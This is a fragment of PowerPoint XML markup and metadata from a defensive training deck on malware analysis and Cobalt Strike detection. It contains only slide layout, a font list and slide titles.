        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="639024" y="1598519"/>
            <a:ext cx="10797072" cy="4458024"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" sx="99000" sy="99000" algn="tl" rotWithShape="0">
              <a:srgbClr val="333333">
                <a:alpha val="65000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1573629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10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C97AFAC3-D0A1-A0FF-AA96-153294AF8216}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="413237" y="1468871"/>
            <a:ext cx="5606563" cy="4317052"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:softEdge rad="112500"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5B5DC41-8FEE-4676-94AA-901F772BCE73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CS Resources Has Been Published to GitHub</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4375125E-2501-4F0B-9FB7-31C13DCB5A07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11537950" y="6311900"/>
            <a:ext cx="654050" cy="546100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:fld id="{6393D41B-4110-4B61-8CE8-CE846C38989A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82137769-48B8-9665-3889-3F9565E4C5A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7250540" y="4860076"/>
            <a:ext cx="2637171" cy="1751442"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" sx="93000" sy="93000" algn="tl" rotWithShape="0">
              <a:srgbClr val="333333">
                <a:alpha val="65000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Graphical user interface, text, email&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6994A11-D1EB-45BF-9803-F47D542EE5C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150691" y="1061960"/>
            <a:ext cx="5621215" cy="3667841"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:softEdge rad="112500"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1863769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TotalTime>
  <Words>7461</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>729</Paragraphs>
  <Slides>23</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Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Gill Sans MT</vt:lpstr>
      <vt:lpstr>Gotham Book</vt:lpstr>
      <vt:lpstr>Gotham Medium</vt:lpstr>
      <vt:lpstr>Impact</vt:lpstr>
      <vt:lpstr>Open Sans</vt:lpstr>
      <vt:lpstr>Rockwell</vt:lpstr>
      <vt:lpstr>Rockwell Condensed</vt:lpstr>
      <vt:lpstr>Rockwell Extra Bold</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wood Type</vt:lpstr>
      <vt:lpstr>The Art of Modern Malware Analysis: Initial Infection Malware, Infrastructure, and C2 Frameworks</vt:lpstr>
      <vt:lpstr>About Josh</vt:lpstr>
      <vt:lpstr>About Aaron</vt:lpstr>
      <vt:lpstr>About Ryan</vt:lpstr>
      <vt:lpstr>What Are We Going to Cover?</vt:lpstr>
      <vt:lpstr>Content from SANS FOR528 Course</vt:lpstr>
      <vt:lpstr>Cobalt Strike Overview</vt:lpstr>
      <vt:lpstr>TA Access to Cobalt Strike –  Forum “4 Sale/Trade”</vt:lpstr>
      <vt:lpstr>CS Resources Has Been Published to GitHub</vt:lpstr>
      <vt:lpstr>Cobalt Strike Architecture &amp; Components</vt:lpstr>
      <vt:lpstr>CS Client &lt;-&gt; Server Communications See for528.com/cs-components</vt:lpstr>
      <vt:lpstr>Malleable C2 Profiles</vt:lpstr>
      <vt:lpstr>Malleable C2 Profile Resources</vt:lpstr>
      <vt:lpstr>You Haz Profiles</vt:lpstr>
      <vt:lpstr>SpawnTo Process Analysis</vt:lpstr>
      <vt:lpstr>Ongoing Game of Whack-a-Mole</vt:lpstr>
      <vt:lpstr>CobaltStrike Commands</vt:lpstr>
      <vt:lpstr>Cobalt Strike Detection &amp; Analysis</vt:lpstr>
      <vt:lpstr>It’s Dangerous to Go Alone! Take These CS Payload Parsers!</vt:lpstr>
      <vt:lpstr>LAB TIME!</vt:lpstr>
      <vt:lpstr>Event ID 4104: PS Script Block Logging</vt:lpstr>
      <vt:lpstr>Event ID 400: Engine State Changes Event ID 600: WSMan Activity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Modern Malware Analysis: Initial Infection Malware, Infrastructure, and C2 Frameworks</dc:title>
  <dc:creator>Ryan Chapman</dc:creator>
  <cp:lastModifiedBy>Ryan Chapman</cp:lastModifiedBy>
  <cp:revision>134</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-01T19:31:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-08-12T19:18:25Z</dcterms:modified>
</cp:coreProperties>
</file>